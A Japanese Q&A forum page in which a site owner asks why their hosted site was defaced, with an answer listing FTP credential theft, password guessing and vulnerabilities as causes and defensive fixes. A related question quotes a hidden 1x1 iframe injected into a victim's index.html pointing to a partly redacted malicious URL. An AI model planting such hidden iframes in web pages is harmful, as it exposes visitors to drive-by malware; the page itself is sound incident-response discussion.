• 締切済み

セキュリティホールを突いた改竄

セキュリティホールを突いた改竄 コアサーバーに契約してます。 今まで普通にアップロードできていたのですが、突然下記のメールが来ました。 早速ですが、お使いのアカウント内で規約違反ページが公開されております。 www.○○○.com おそらくお使いのサイト内のセキュリティホールを突いた改竄であると思われます。 一旦こちらで非公開設定にさせていただきました。 ご確認の上、よろしくご理解、ご対応いただければと存じます。 いったいなぜ・・・。 どうやったら解決できるのか、初めてのことなのでご意見を伺いたいと思いました。 サイトが止まってしまうと、困るのです・・・。 コアサーバーさんからは返事待ちです。 どうぞよろしくお願いいたします。

みんなの回答

noname#116115
noname#116115
回答No.1

情報が足りないので推測です。 1.ガンブラー系のウイルスに感染した  現象 FTPアカウントを乗っ取られページ内にウイルスの感染コードが追加された。  原因 管理用端末がウイルスに感染するとFTPの通信を監視され、アカウントとパスワードを取得される。  対策 管理用端末のウイルスチェック、Windows Updateの実施、FTPアカウントのパスワード変更、     サイトのウイルスの除去(すべてのページを確認する必要があります。) 2.パスワード推測による乗っ取り  現象 なんでもあり  原因 よくあるパスワードを使用しており、第三者が簡単に修正できるようになっていた。  対策 パスワードを複雑なものに変更、サイトの全データの入れ替え 3.サイトそのものの脆弱性を付いた攻撃  想定される状況が多岐に渡るのでコアサーバーさんの回答待ちですね。  

  1. カテゴリ
  2. [技術者向] コンピューター
  3. ITシステム運用・管理
  4. ネットワーク

関連するQ&A

  • exploitコード(セキュリティホール)の見つけ方

    よく、セキュリティサイトとかでexploitのソースが公開されていますが ハッカー達は、どうやってセキュリティホールを見つけるのでしょうか? 専門のツールなどを動かしておけば勝手に見つけてくれるのでしょうか? それとも、対象物にハッキング?みたいなことをして見つけるのでしょうか? ふと、疑問に思ったので質問しました。回答お願いしますm(__)m

  • ウィルスバスターでセキュリティホールが見つかりましたが

    windowsVistaを使っています。WINDOWSの更新も毎日設定してありますし、ウィルスバスターでしっかり保護してネットをしています。 ですが、今日夕方、起動がいつもより遅いなと思ったり、調子が悪くて再起動を繰り返したりしたので、バスターで全ドライブスキャンをかけてみたところ、セキュリティホールが見つかりました。 見つかったのは以下のセキュリティホールです。 >Microsoft Excel の脆弱性により、リモートでコードが実行される >(934233) (MS07-023) マイクロソフトのサイトで見ると、このセキュリティホールの公開日は2007年5月ということで、ちょっと不思議に思っています。 というのは、これまでも更新はしてきたし、全ドライブスキャンもかけて、何も怪しいものは出ないという状態が続いてきました。なので、どうして今日になって突然そんなセキュリティホールの警告が出るのだろう・・・と。 いまアップデートで修正中ですが、どうして今日になって突然このようなセキュリティホールが出現したのか、可能性のあることがあれば教えていただきたく思います。

  • セキュリティホールがあるのにアップデート出来ない。

    だいぶ前からなんですがパソコンが少し重いので、トレンドマイクロのオンラインスキャンで検索するとウイルスは見つからないのですがセキュリティーホールが見つかります。 レベルも「緊急」だったので急いでマイクロソフトでアップデートをしょうと思いましたが「お使いのコンピュータに該当する優先度の高い更新プログラムは存在しません」と出ます。 僕は「オンラインスキャンだから、いいかげんなモンだな」と思いました。 それから半年位ほったらかしで、その間オンラインスキャンも何回かしましたが最初はセキュリティホールが3個だったのに、だんだん増えてきて今は6個あります。 僕は無駄だと分かっていながらマイクロソフトのサイトへアップデートしに行き、やはり「お使いのコンピュータに該当する優先度の高い更新プログラムは存在しません」と出ます。 毎度の事だから気にしていなかったのですが、最近パソコンの立ち上げが遅くなって設定が全て初期化されているといった事がありました。 ツールバーの色とかインターネットオプションの設定とか全てです。 その時は、教えてgooにも相談させていただき故障かウイルスだとアドバイスされました。 そして昨日電源を入れると、なんでか分からないけど元の状態に戻っていました。 今のパソコンは貰い物で7~8年は経ちます。 そろそろ買い替えようと思っていますので、あまり困っていないのですが、やはり疑問です・・。 なぜセキュリティホールがあるのにアップデート出来ないんでしょうか? やはりオンラインスキャンだからですかね? それともパソコンの寿命でしょうか? 宜しくお願いします。

  • 画像アップロードサイトから公開して問題ありますか?

    海外の画像検索サイトから、PCに保存してアップロードサイトで公開するのは禁止ですか? よく画像の角に***.comとかありますが。 やはり著作権とかに違反するのでしょうか? 初歩的な事ですみませんがお願いします。

  • PHP4.4.0以下に起こるセキュリティホールについて

    お世話になります。 現在某レンタルサーバでPHPを使用しています。 先月末、PHPに最悪のセキュリティホールが発見されました。 http://itpro.nikkeibp.co.jp/article/NEWS/20051102/223939/ この件に関して、早急にバージョンを上げて欲しいということで レンタルサーバ業者に連絡を入れたのですが、 1.PHP4.4.1は仕様の変更がかなりあっているので、共有サーバという性質上、バージョンアップは難しい 2.セキュリティホールではあるが、サーバ自体に影響のある類のものでは無い 3.PHPコードのサニタイジングで対応可能 だという理由で今のところバージョンアップの予定は無いという回答でした。 そこで、とにかくも「3.PHPコードのサニタイジングで対応可能。」だという回答は貰えましたので、 早速今回のセキュリティホールに対応しようと行動を開始したのですが、 どこから手をつけて良いのか判らない状態です。 私なりに今回のセキュリティホールがどんなものか、理解しようと思い、以下のサイトを参照してみたのですが http://www.hardened-php.net/index.76.html ようはinputタグのtypeがfileであり、かつname="GLOBALS"の時、 PHPの大域変数(global変数という呼び方が一般的ですが、紛らわしいのでここでは大域変数と呼びます)が アップロードしたファイル名で上書きされる、といったところでしょうか?(自信なし) だとするならばサニタイジングするべきは、局所変数でない箇所すべて、ということになりますが この認識で合っているのでしょうか? 前置きが長くなりましたが、今回教えて欲しい点は サニタイジングすべきPHPの変数は、 ・大域変数全てなのか? ・スーパーグローバル変数全てなのか? ・$GLOBALS全てなのか? です。

    • ベストアンサー
    • PHP
  • Powered by FC2.comの表示

    自分はFC2のレンタルサーバーで携帯用のサイトを作りました。 ↓これです。 http://bootsstrap.web.fc2.com/i/index.html ディレクトリはiに入れているので、パソコンでそのサイトをみると「Powered by FC2.com」というリンクは表示されません。 また携帯で見たときはiディレクトリに入れていなくてもそのリンクは表示されません。 これは規約違反になってしまうのではないかと思ったのですが、いろいろ調べても自分の力では対処法を見つけることができませんでした。 そのためお聞きしたいことは、 ・携帯でサイトを見たとき「Powered by FC2.com」が表示されていないのは規約違反なのか。 ・iディレクトリに入っている携帯サイトでもパソコンで見たとき「Powered by FC2.com」が表示されていなければ規約違反なのか。 ・規約違反ならばどうやって携帯サイトで「Powered by FC2.com」を表示させればいいのか。 質問が多くて本当に申し訳ありません。 どれか1つでもいいのでよろしければどなたか教えていただけないでしょうか? よろしくお願いします。

  • FF11アカウントについて

    FF11のアカウントを購入しました。 当然規約違反だと言うことは承知しております。 このアカウントのパスが改ざんされてしまいました。 購入したアカウントのパスワードの再発行は無理なのでしょうか? 初代のオーナーさんとは連絡の付けようがありません。 このまま捨てるしかないんですかね? 登録もクレカ登録なので延々引き落としにされるのでしょうか?

  • [スマホゲーム] Androidエミュでサブ垢作成

    とあるスマホゲームをプレイしております。 PC内のAndroidエミュレータを使用して、 サブアカウントを複数作成しているのですが、 このような行為は規約違反になったりするのでしょうか?? ちなみに、データの改ざんや自動化は行っておらず、 ログインボーナスや、アイテムをメインアカウントへ渡している程度です。 (あとアイテム倉庫として使ったり また規約違反だった場合、 メインアカウントがBANされてしまうことはありますか? なんのゲームかによって回答は変わると思いますが、 ゲーム名をGoogle検索して、 このページがヒットすることを避けるため、ゲーム名をわざと伏せています。 あまりいいプレイの仕方ではないとわかっているので・・・・ どうかよろしくお願いいたします。

  • どちらも規約違反ですか?

    こんにちは 下記の場合、どちらもokwaveの規約違反になりますか? (1) 一人の人が二つのアカウントを作って、二人いるように装う (2) 一つのアカウントを、夫婦や兄弟などの複数が共有する

  • <iframe>を使ったページ改ざんにあいました。対策をご教授お願いいたします。

    初めて、質問をさせていただきます。 WEB関係の仕事をしていながら大変お恥ずかしいのですが、 アタックにより、管理しているウェブサイトの一部が改ざんされました。 (現象) 具体的には、「index.html」と名づけされたファイルの ソース最終部分に、以下のコードが追記されていました。 【URLは念のため、書き換えています】 <iframe src="?http://***.net/?click=D1A4LDM"? width=1 height=1 style="visibility:hidden;position:absolute"></iframe> ※他ファイル名は、拡張子が「html」であっても一切被害なし ※私は直接アクセスしていませんが、他担当によると、  本ドメインに接続すると、ブラウザクラッシュしたとの報告がありました。 ※click=以降の英数7文字は、乱数により各ページに異なった文字が記載 また、書き換えられたファイルのタイムスタンプを確認し、 該当時間のftpサーバログを調べると、社内IPからの接続形跡があり、 今回、改ざんされていた該当ファイルの書き換え履歴がありました。 現在、全ファイルの該当箇所を削除し、再アップロード。 また、利用していたFTPアカウントを廃止し、新規FTPアカウントを発行しました。 IDCには、サーバがクラックされた可能性がないが調査依頼し、 現在のところ、調査中です。 (ウイルスの疑いと、発見・駆除) ただ、その時間帯に誰もFTPを行っていなかったため、 ウイルスの可能性が考えられ、対策ソフトでスキャンしたところ、 1台より、W32.Sality.AM というウイルスが検出され、駆除しました。 ?http://www.threatexpert.com/report.aspx?md5=25583fd04e8f408a56f30ba...? しかし、ウイルスの性質を見ても、ftpアカウントを盗聴し、 特定サイトに接続し、index.htmlファイルをダウンロード、改ざん、アップロードする・・といった行為を 働くようなことは記載されていませんでした。 (皆様へご相談) FTPログに社内IPからのFTP接続履歴があったため、我々のセキュリティに問題があったことを 推測しているのですが、ウイルスレポートからも、発見されたウイルスが、現象を引き起こしたとは 特定しにくいと感じております。 そのため、ウイルス対策ソフトでは特定できない別のウイルスに感染している可能性を考えております。 国内のQ&Aサイトでは、同様の現象を発見できなかったため、 海外の掲示板を見たところ、同様の現象を発見したのですが、 原因までは特定されていませんでした。 そこで、ご存知の方がいらっしゃいましたらお知恵を拝借させていただきたいのですが、 本件の原因は何によるものでしょうか? また、書き換えられた箇所削除・FTPアカウント変更の他にすべき対策や、 今後のための予防措置などあれば、アドバイスいただけますと有難く存じます。 何卒、宜しくお願いいたします。

注目のQ&A

カテゴリ

専門家に質問してみよう

職業から探して質問する

あなたにピッタリな商品が見つかる! OKWAVEセレクト

質問する